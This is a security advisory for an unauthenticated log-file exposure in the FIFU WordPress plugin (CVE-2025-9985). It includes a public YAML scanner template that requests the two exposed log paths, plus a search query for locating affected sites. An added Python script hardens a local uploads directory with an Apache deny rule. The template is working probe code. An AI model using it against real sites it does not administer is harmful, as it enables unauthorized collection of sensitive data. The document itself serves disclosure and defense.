The Featured Image from URL (FIFU) plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.2.7 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files.
PoC code [public]
id: CVE-2025-9985

info:
  name: Featured Image from URL (FIFU) <= 5.2.7 - Unauthenticated Information Exposure via Log File
  author: zer0p0int
  severity: medium
  description: |
    The Featured Image from URL (FIFU) plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.2.7 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files.
  impact: |
    Unauthenticated attackers can view sensitive information from exposed log files, potentially leading to information disclosure.
  remediation: |
    Update to the latest version of the Featured Image from URL (FIFU) plugin.
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/featured-image-from-url/"
  tags: cve,cve2025,wordpress,wp,wp-plugin,unauth,vuln,featured-image-from-url,log

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/fifu-plugin.log"
      - "{{BaseURL}}/wp-content/uploads/fifu-cloud.log"

    redirects: true
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"fifu-dimensions":'
          - '"Invalid size:'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022018bea06f9c69ab854c0d3145c2e8a6958953a8ed5f4598300bfac62837bbd49002206451f6824eba516fc8cf748a7b261cd33ec88f72b83415b928ff21aaa483c36b:922c64590222798bb761d5b6d8e72950
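The template above only tells you whether the two log files are reachable over HTTP. As an added example (not part of the advisory, the template, or the FIFU plugin), the script below audits a local WordPress uploads directory for those same log files and appends an Apache deny rule so they stop being served while the plugin update is rolled out. The uploads path, the `.htaccess` layout and the sample log content are assumptions; the file names come from the template's request paths.

```python
import tempfile
from pathlib import Path

# Log file names taken from the advisory's request paths.
FIFU_LOG_NAMES = ("fifu-plugin.log", "fifu-cloud.log")

# Apache 2.4 rule appended to uploads/.htaccess (assumed layout; needs AllowOverride).
DENY_RULE = """# Block direct web access to FIFU log files (added hardening)
<FilesMatch "^fifu-(plugin|cloud)\\.log$">
    Require all denied
</FilesMatch>
"""


def find_fifu_logs(uploads_dir):
    """Return (name, size_in_bytes) for each FIFU log present on disk."""
    found = []
    for name in FIFU_LOG_NAMES:
        p = Path(uploads_dir) / name
        if p.is_file():
            found.append((name, p.stat().st_size))
    return found


def harden_uploads(uploads_dir):
    """Append DENY_RULE to uploads/.htaccess once; True if the file changed."""
    htaccess = Path(uploads_dir) / ".htaccess"
    existing = htaccess.read_text() if htaccess.is_file() else ""
    if "fifu-(plugin|cloud)" in existing:
        return False  # rule already present, keep the file idempotent
    with htaccess.open("a") as fh:
        if existing and not existing.endswith("\n"):
            fh.write("\n")
        fh.write(DENY_RULE)
    return True


def demo():
    """Constructed scenario: scratch uploads dir with a sample fifu-plugin.log."""
    d = tempfile.mkdtemp()
    sample = '{"fifu-dimensions": {"w": 640}}'  # constructed sample log line
    (Path(d) / "fifu-plugin.log").write_text(sample)
    logs = find_fifu_logs(d)
    first, second = harden_uploads(d), harden_uploads(d)
    return logs, first, second, (Path(d) / ".htaccess").read_text()


if __name__ == "__main__":
    print(demo())
```

On nginx the `.htaccess` file is ignored, so the equivalent `location` deny must be added to the server configuration instead; either way, rotating or deleting the already-exposed logs is still required.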